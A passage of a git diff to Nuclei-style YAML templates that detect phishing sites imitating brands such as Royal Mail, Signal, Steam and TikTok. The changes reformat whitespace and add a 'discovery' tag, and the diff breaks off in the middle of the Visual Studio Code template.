a/http/osint/phishing/royal-mail-phish.yaml +++ b/http/osint/phishing/royal-mail-phish.yaml @@ -1,5 +1,5 @@ -id: royal-mail-phish - +id: royal-mail-phish + info: name: royal-mail phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://royalmail.com metadata: max-request: 1 - tags: phishing,royal-mail,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Log in | Royal Mail Group Ltd' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,royal-mail,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Log in | Royal Mail Group Ltd' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"royalmail.com")' # digest: 4a0a00473045022100e443b159166b14330a53af3e24060b9fc1fcbe6db4a627dc4b9811cad94701db02202359e676304cedba28b3bb3a2acdd3bd9ee7e15e155c7083cbafeb3d2c882f97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/samsung-phish.yaml b/http/osint/phishing/samsung-phish.yaml index 2f3e8f6320e..155467b5d37 100644 --- a/http/osint/phishing/samsung-phish.yaml +++ b/http/osint/phishing/samsung-phish.yaml @@ -1,5 +1,5 @@ -id: samsung-phish - +id: samsung-phish + info: name: samsung phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://samsung.com metadata: max-request: 1 - tags: phishing,samsung,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Samsung UK | Mobile | Home Electronics | Home Appliances | TV' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,samsung,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Samsung UK | Mobile | Home Electronics | Home Appliances | TV' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"samsung.com")' # digest: 4a0a00473045022100c432221f51073ee0af0d32a777a4498c5c104e9d1222027d594bdafe7c192b1302201d44425a9cbd6859667bc850d5aa19fcce860a5c6861299f9e86c0b2635817de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/signal-phish.yaml b/http/osint/phishing/signal-phish.yaml index 08939957f5c..f11040bc1ff 100644 --- a/http/osint/phishing/signal-phish.yaml +++ b/http/osint/phishing/signal-phish.yaml @@ -1,5 +1,5 @@ -id: signal-phish - +id: signal-phish + info: name: signal phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://signal.org metadata: max-request: 1 - tags: phishing,signal,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Say "hello" to a different messaging experience. An unexpected focus on privacy, combined with all of the features you expect.' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,signal,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Say "hello" to a different messaging experience. An unexpected focus on privacy, combined with all of the features you expect.' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"signal.org")' # digest: 4b0a00483046022100a8a611b1b4d6c665e977780288bbd6d9db83511fa81d7425701c177d04862a490221008ac2deeb2ce2c0d2babd3d8e1f25241098c2a95605e9ecbdda2ddc78847c81bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/sky-phish.yaml b/http/osint/phishing/sky-phish.yaml index c4a45c99bd5..5cee35f14ef 100644 --- a/http/osint/phishing/sky-phish.yaml +++ b/http/osint/phishing/sky-phish.yaml @@ -1,5 +1,5 @@ -id: sky-phish - +id: sky-phish + info: name: sky phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://sky.com metadata: max-request: 1 - tags: phishing,sky,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Discover TV, Broadband & Mobile Phone Packages with Sky' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,sky,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Discover TV, Broadband & Mobile Phone Packages with Sky' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"sky.com")' # digest: 4b0a00483046022100afa08abc0145a02fd6722e12bcb8f202301d6c84346f12de19e43c3b609288cb022100be4e349b61f60a6cfdace1aca4b0e6c3fdd688cee77079fa6b1740d897b9a62f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/skype-phish.yaml b/http/osint/phishing/skype-phish.yaml index b3b1c6a6c64..5adb73a560d 100644 --- a/http/osint/phishing/skype-phish.yaml +++ b/http/osint/phishing/skype-phish.yaml @@ -1,5 +1,5 @@ -id: skype-phish - +id: skype-phish + info: name: skype phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://skype.com metadata: max-request: 1 - tags: phishing,skype,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Skype | Stay connected with free video calls worldwide' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,skype,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Skype | Stay connected with free video calls worldwide' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"skype.com")' # digest: 4a0a00473045022100ae0b3484fb19890fc6da5a497171c77e5b661d1a83d881ae75761a601afb25fd02201e29e7ffbee280b5ffb61ef938c61abe95af5eac8ed7f5049fe0eb0852eb0854:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/skyscanner-phish.yaml b/http/osint/phishing/skyscanner-phish.yaml index 618af818a97..5b52918c689 100644 --- a/http/osint/phishing/skyscanner-phish.yaml +++ b/http/osint/phishing/skyscanner-phish.yaml @@ -1,5 +1,5 @@ -id: skyscanner-phish - +id: skyscanner-phish + info: name: skyscanner phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://skyscanner.net metadata: max-request: 1 - tags: phishing,skyscanner,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Compare Cheap Flights & Book Airline Tickets to Everywhere | Skyscanner' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,skyscanner,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Compare Cheap Flights & Book Airline Tickets to Everywhere | Skyscanner' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"skyscanner.net")' # digest: 4a0a0047304502204714cc13da9edc1eb474d2886e9352bbfbd81124f3346194f890f8f98906a8ca0221008c39fbc651966dac90f1e0dffd15c3726af1dbd76bceb764876797d1e645f1de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/slack-phish.yaml b/http/osint/phishing/slack-phish.yaml index 49be96f2183..210b609b4c8 100644 --- a/http/osint/phishing/slack-phish.yaml +++ b/http/osint/phishing/slack-phish.yaml @@ -1,5 +1,5 @@ -id: slack-phish - +id: slack-phish + info: name: slack phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://slack.com metadata: max-request: 1 - tags: phishing,slack,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Slack is a new way to communicate with your team. It’s faster, better organised and more secure than email.' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,slack,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Slack is a new way to communicate with your team. It’s faster, better organised and more secure than email.' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"slack.com")' # digest: 490a0046304402200ac15f1bb112aeacb4f9ed0357d7927ed1faabc544d8e52b9c75c5310676235002202dcce2cffdbb505366435298e49203eec65ba56f13491bc8adf344b72b2b31d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/sophos-phish.yaml b/http/osint/phishing/sophos-phish.yaml index 93914f6dd40..4c65b9baa89 100644 --- a/http/osint/phishing/sophos-phish.yaml +++ b/http/osint/phishing/sophos-phish.yaml @@ -1,5 +1,5 @@ -id: sophos-phish - +id: sophos-phish + info: name: sophos phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://sophos.com metadata: max-request: 1 - tags: phishing,sophos,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Cybersecurity as a Service Delivered | Sophos' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,sophos,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Cybersecurity as a Service Delivered | Sophos' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"sophos.com")' # digest: 4a0a004730450220451c5492d4b9c6d24cea0af2e0bd0a4fdc9aabe4f530918134eebdfc37eeedad0221009fba2b50c010a894656185dac5b3656f843a26e4948641865023a4caa29ebc57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/spotify-phish.yaml b/http/osint/phishing/spotify-phish.yaml index 9dae25ff914..da0afd649b8 100644 --- a/http/osint/phishing/spotify-phish.yaml +++ b/http/osint/phishing/spotify-phish.yaml @@ -1,5 +1,5 @@ -id: spotify-phish - +id: spotify-phish + info: name: spotify phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://spotify.com metadata: max-request: 1 - tags: phishing,spotify,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Spotify - Web Player: Music for everyone' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,spotify,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Spotify - Web Player: Music for everyone' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"spotify.com")' # digest: 4a0a00473045022014071814131bf46e7f6bbe0405d403f361a6648f2156827ff9f9c4402068b95902210082e0f6a67b7199c6a1cf1d93c629555675a84dbb0c0d94e6f7d8cef43a486899:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/steam-phish.yaml b/http/osint/phishing/steam-phish.yaml index cbabcfcd058..9e00817417e 100644 --- a/http/osint/phishing/steam-phish.yaml +++ b/http/osint/phishing/steam-phish.yaml @@ -1,5 +1,5 @@ -id: steam-phish - +id: steam-phish + info: name: steam phishing Detection author: rxerium @@ -10,29 +10,29 @@ info: - https://steampowered.com metadata: max-request: 1 - tags: phishing,steam,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Welcome to Steam' - - 'Steam is the ultimate destination for playing, discussing, and creating games.' - condition: and - - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,steam,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Welcome to Steam' + - 'Steam is the ultimate destination for playing, discussing, and creating games.' + condition: and + + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"steampowered.com")' # digest: 490a0046304402200a5d3331433eaa57a6bbe797b1ab2fbc4bf629af79ccfe9e8eb10a88a1c4ca50022056b1c5720b39fb570cc19763c4b6672a7213b29023089f51c64de35731574575:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/sync-storage-phish.yaml b/http/osint/phishing/sync-storage-phish.yaml index 8e0be743b91..f1f81032610 100644 --- a/http/osint/phishing/sync-storage-phish.yaml +++ b/http/osint/phishing/sync-storage-phish.yaml @@ -1,5 +1,5 @@ -id: sync-phish - +id: sync-phish + info: name: sync storage phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://sync.com metadata: max-request: 1 - tags: phishing,sync,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Sync | Secure Cloud Storage, File Sharing and Document Collaboration' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,sync,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Sync | Secure Cloud Storage, File Sharing and Document Collaboration' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"sync.com")' # digest: 4a0a00473045022100cf4e470415a57b516653408c77defc591fb79684b37e989b02cde65ed81fe6fc022009dd4c136aee8869b3389152ea9df2e0ec03ccf68092e8e79588e9187335d575:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/target-phish.yaml b/http/osint/phishing/target-phish.yaml index cce92663890..a544c58d81a 100644 --- a/http/osint/phishing/target-phish.yaml +++ b/http/osint/phishing/target-phish.yaml @@ -1,5 +1,5 @@ -id: target-phish - +id: target-phish + info: name: target phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://target.com metadata: max-request: 1 - tags: phishing,target,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Target : Expect More. Pay Less.' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,target,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Target : Expect More. Pay Less.' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"target.com")' # digest: 490a00463044022026ec0da9d3a4f37661818c39bfe062f3b9dea7581b261ab77b54cb82735fe54902206dc714c610a8c8f89a428cf8296284b71e926e73e99e70c976e9436119e705e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/teamviewer-phish.yaml b/http/osint/phishing/teamviewer-phish.yaml index 837c48c3bbd..3799071c4ab 100644 --- a/http/osint/phishing/teamviewer-phish.yaml +++ b/http/osint/phishing/teamviewer-phish.yaml @@ -1,5 +1,5 @@ -id: teamviewer-phish - +id: teamviewer-phish + info: name: teamviewer phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://teamviewer.com metadata: max-request: 1 - tags: phishing,teamviewer,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'TeamViewer – The Remote Connectivity Software' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,teamviewer,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'TeamViewer – The Remote Connectivity Software' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"teamviewer.com")' # digest: 490a0046304402203a8d934b9e5136491d7e9961d64a1d2a6bb90f2c8a5069065929a47fe9e9aeda0220437a4ffc8f5a3e941f5f6b0626c2e701098be02146a363d16c9c4bc892469ffd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/telegram-phish.yaml b/http/osint/phishing/telegram-phish.yaml index d62db2438bb..6d9dcc2826e 100644 --- a/http/osint/phishing/telegram-phish.yaml +++ b/http/osint/phishing/telegram-phish.yaml @@ -1,5 +1,5 @@ -id: telegram-phish - +id: telegram-phish + info: name: telegram phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://telegram.org metadata: max-request: 1 - tags: phishing,telegram,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Telegram is a cloud-based mobile and desktop messaging app with a focus on security and speed.' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,telegram,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Telegram is a cloud-based mobile and desktop messaging app with a focus on security and speed.' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"telegram.org")' # digest: 4a0a0047304502201344af6d99ca8925f7fbf4a9aa4b667a10faad7e5093635d31efe386553badff0221009d711d9dc927caf892158ffdae6a19d572ca216577cbe0a9df6c9376571d71b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/three-mobile-phish.yaml b/http/osint/phishing/three-mobile-phish.yaml index 08c5f244af1..52b8d4d94aa 100644 --- a/http/osint/phishing/three-mobile-phish.yaml +++ b/http/osint/phishing/three-mobile-phish.yaml @@ -1,5 +1,5 @@ -id: three-mobile-phish - +id: three-mobile-phish + info: name: three phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://three.co.uk metadata: max-request: 1 - tags: phishing,three,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Three | Phones, Broadband & SIM Only deals' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,three,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Three | Phones, Broadband & SIM Only deals' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"three.co.uk")' # digest: 4b0a00483046022100b35a736338003dc435fd3d3fa0a1b4412731d93643810f08d287b5027bffef6b022100a58fb0e2d7b3f85abdae139c9c9587b02841346d7ad37677bb11ec3e2c09067f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/thunderbird-phish.yaml b/http/osint/phishing/thunderbird-phish.yaml index 145645e7100..4219ed44c58 100644 --- a/http/osint/phishing/thunderbird-phish.yaml +++ b/http/osint/phishing/thunderbird-phish.yaml @@ -1,5 +1,5 @@ -id: thunderbird-phish - +id: thunderbird-phish + info: name: thunderbird phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://thunderbird.net metadata: max-request: 1 - tags: phishing,thunderbird,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Thunderbird — Free Your Inbox. — Thunderbird' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,thunderbird,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Thunderbird — Free Your Inbox. — Thunderbird' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"thunderbird.net")' # digest: 490a004630440220451e6b8f20342faa9e7071b0760b6f4ac40c04955a76c4a47684b027ed9892e802201acb4128695bd32bb7d6e8026ee5fce9f8f936816fe8a92ce489232a21d81468:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/ticketmaster-phish.yaml b/http/osint/phishing/ticketmaster-phish.yaml index 327e402221b..7f05f5761a7 100644 --- a/http/osint/phishing/ticketmaster-phish.yaml +++ b/http/osint/phishing/ticketmaster-phish.yaml @@ -1,5 +1,5 @@ -id: ticket-master-phish - +id: ticket-master-phish + info: name: ticket master phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://ticketmaster.com metadata: max-request: 1 - tags: phishing,ticket-master,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Buy and sell tickets online for concerts, sports, theater, family and other events near you from Ticketmaster.' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,ticket-master,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Buy and sell tickets online for concerts, sports, theater, family and other events near you from Ticketmaster.' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"ticketmaster.com")' # digest: 4b0a00483046022100ba1dd6f6f2735366b3a60b19d1d23c8da2260e1e8cee104f6c597f47277a4bea022100bdfc82e8cf7ceb6dd8d855d6379ea4dbd0519c2c3af5ba366f250ad966050dc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/tiktok-phish.yaml b/http/osint/phishing/tiktok-phish.yaml index d1bf86b9b0a..fb7b5ba32cb 100644 --- a/http/osint/phishing/tiktok-phish.yaml +++ b/http/osint/phishing/tiktok-phish.yaml @@ -1,5 +1,5 @@ -id: tiktok-phish - +id: tiktok-phish + info: name: tiktok phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://tiktok.com metadata: max-request: 1 - tags: phishing,tiktok,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'TikTok - Make Your Day' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,tiktok,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'TikTok - Make Your Day' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"tiktok.com")' # digest: 4a0a00473045022100e2d6b7acbc8476ea7a39efdabfd1f647500d0ec07284663e59e495bc9ea4393902201ab5a0c6c7ffdc5c1a4fcfd716b6c293225d4996012c385b7f2b880178bf96aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/trading212-phish.yaml b/http/osint/phishing/trading212-phish.yaml index 562cbb38db1..5f8f406de71 100644 --- a/http/osint/phishing/trading212-phish.yaml +++ b/http/osint/phishing/trading212-phish.yaml @@ -1,5 +1,5 @@ -id: trading212-phish - +id: trading212-phish + info: name: trading212 phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://trading212.com metadata: max-request: 1 - tags: phishing,trading212,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Commission-free investing for everyone | Trading 212' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,trading212,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Commission-free investing for everyone | Trading 212' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"trading212.com")' # digest: 4b0a00483046022100d0a9a8b5ab73bdd3067442845e9a12f102123c89909c474860cb109b5a73be68022100fdcf1d3fc8f1f5b52b8797c596d586cb4f8bc0f0cb7cda49470fbd08c2eb1990:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/trend-micro-phish.yaml b/http/osint/phishing/trend-micro-phish.yaml index b9b4e5a927b..d2b63a8ce95 100644 --- a/http/osint/phishing/trend-micro-phish.yaml +++ b/http/osint/phishing/trend-micro-phish.yaml @@ -1,5 +1,5 @@ -id: trend-micro-phish - +id: trend-micro-phish + info: name: trend micro phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://trendmicro.com metadata: max-request: 1 - tags: phishing,trend-micro,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Trend Micro (UK) | Internet Security Antivirus - PC & Mac' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,trend-micro,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Trend Micro (UK) | Internet Security Antivirus - PC & Mac' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"trendmicro.com")' # digest: 490a00463044022034b4e845c74e7ee0faa2fbda829f3ce6ad387ef59a9a1e04196318227d332abf022008f98637a8b58c1cec89bf2c9e4dd9dac2455f0b2c948e93d002a1948d12f7d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/trip-phish.yaml b/http/osint/phishing/trip-phish.yaml index c78b54c2345..88717123f4f 100644 --- a/http/osint/phishing/trip-phish.yaml +++ b/http/osint/phishing/trip-phish.yaml @@ -1,5 +1,5 @@ -id: trip-phish - +id: trip-phish + info: name: trip phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://trip.com metadata: max-request: 1 - tags: phishing,trip,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Trip.com: Book cheap flights, hotels, car rentals, trains and more' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,trip,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Trip.com: Book cheap flights, hotels, car rentals, trains and more' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"trip.com")' # digest: 4a0a00473045022100aacef86c9b161e558c8ab21619fa827bea70e7bfbe2eea3b242a611b447b6a30022071db5343226b5255eb69994fc7155be2cef3935e92d18f4e4893815d1981285a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/twitch-phish.yaml b/http/osint/phishing/twitch-phish.yaml index bcfd8c33e32..21cabd89ac4 100644 --- a/http/osint/phishing/twitch-phish.yaml +++ b/http/osint/phishing/twitch-phish.yaml @@ -1,5 +1,5 @@ -id: twitch-phish - +id: twitch-phish + info: name: Twitch phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://twitch.tv metadata: max-request: 1 - tags: phishing,twitch,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Twitch is an interactive livestreaming service for content spanning gaming, entertainment, sports, music, and more. There’s something for everyone on Twitch.' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,twitch,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Twitch is an interactive livestreaming service for content spanning gaming, entertainment, sports, music, and more. There’s something for everyone on Twitch.' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"twitch.tv")' # digest: 4a0a00473045022005ccfe141c1447970fc1e3d926f64ceb9ca4f52b9b1b52ac6328ef1892407112022100f967ab35bd2e56b94baa14796200bd5e610a75866198f830a11a109ae177f03d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/uber-phish.yaml b/http/osint/phishing/uber-phish.yaml index 2e6a3cab95b..895926884a8 100644 --- a/http/osint/phishing/uber-phish.yaml +++ b/http/osint/phishing/uber-phish.yaml @@ -1,5 +1,5 @@ -id: uber-phish - +id: uber-phish + info: name: uber phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://uber.com metadata: max-request: 1 - tags: phishing,uber,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Explore the Uber Platform | Uber' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,uber,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Explore the Uber Platform | Uber' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"uber.com")' # digest: 4a0a004730450221009496fc532be12d3197aab2365b5a44c490384c871650baea0d8b3679aabeb7fa022014d326e999b11e6a9eb4ac557479093338ddccd55c0f53d625ffb704c527d2f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/visual-studio-code-phish.yaml b/http/osint/phishing/visual-studio-code-phish.yaml index 0721e3aeaab..29135d47042 100644 --- a/http/osint/phishing/visual-studio-code-phish.yaml +++ b/http/osint/phishing/visual-studio-code-phish.yaml @@ -1,5 +1,5 @@ -id: visual-studio-code-phish - +id: visual-studio-code-phish + info: name: visual studio code phishing Detection author: rxerium @@ -10,28 +10,28 @@ info: - https://visualstudio.com metadata: max-request: 1 - tags: phishing,visual-studio-code,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Visual Studio Code is a code editor redefined and optimized for building and debugging modern web and cloud applications. Visual Studio Code is free and available on your favorite platform - Linux, macOS, and Windows.' - - 'Visual Studio Code - Code Editing. Redefined' - condition: and - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,visual-studio-code,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + 